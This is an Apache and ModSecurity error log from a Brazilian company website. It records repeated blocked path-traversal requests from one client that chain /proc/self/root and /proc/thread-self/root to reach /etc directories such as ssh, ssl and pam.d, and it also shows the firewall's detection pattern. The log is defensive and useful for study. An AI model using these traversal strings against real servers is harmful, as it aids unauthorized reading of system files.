[Tue Mar 17 16:51:25.337141 2026] [:error] [pid 2598:tid 140411616036608] [client 74.7.241.31:42238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwvRj0p0SRWAqcjGGKcAAAAw8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:32.140049 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36508] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:51:33.567216 2026] [:error] [pid 6296:tid 140411616036608] [client 74.7.241.31:55078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwxXIk7brgkOH-rIWdDwAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:36.499576 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:55094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwyNa6ubjKNq_cu4YZVgAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:37.991391 2026] [:error] [pid 18380:tid 140411691570944] [client 74.7.241.31:36186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwya4xEDsg_V3ESNZclgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:39.473133 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:36200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwy9Y0UrI5A3LftIwOWAAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:40.811910 2026] [:error] [pid 18380:tid 140411725141760] [client 74.7.241.31:36204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwzK4xEDsg_V3ESNZcmQAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:42.173236 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:36216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwztY0UrI5A3LftIwOWwAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:43.528232 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:36224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmwz_PqhzTj3BvfDX-YuQAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:45.212177 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:36232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw0Rj0p0SRWAqcjGGKeAAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:47.015053 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:36240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw09Y0UrI5A3LftIwOYQAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:48.497644 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.241.31:53344] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw1HIk7brgkOH-rIWdGAAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:50.686175 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:53356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw1vPqhzTj3BvfDX-YuwAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:53.719974 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:53362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw2aBJNF7axNlVR0UpZwAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:53.935086 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.241.31:53362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw2aBJNF7axNlVR0UpaAAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:51:55.166052 2026] [proxy_fcgi:error] [pid 7437:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37212] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:51:56.734746 2026] [:error] [pid 6296:tid 140411616036608] [client 74.7.241.31:53366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw3HIk7brgkOH-rIWdHQAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:00.456995 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.241.31:45120] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw4AeiSKl8TjouI-YpDAAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:04.598223 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.241.31:45128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw5AeiSKl8TjouI-YpDQAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:07.558829 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.31:36206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw564xEDsg_V3ESNZcqgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:10.366520 2026] [:error] [pid 18380:tid 140411616036608] [client 74.7.241.31:36206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw6q4xEDsg_V3ESNZcsgAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:18.125807 2026] [proxy_fcgi:error] [pid 25836:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37710] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:52:19.522681 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.31:41440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw86BJNF7axNlVR0UpbQAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:52:19.722637 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.31:41440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmw86BJNF7axNlVR0UpbwAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
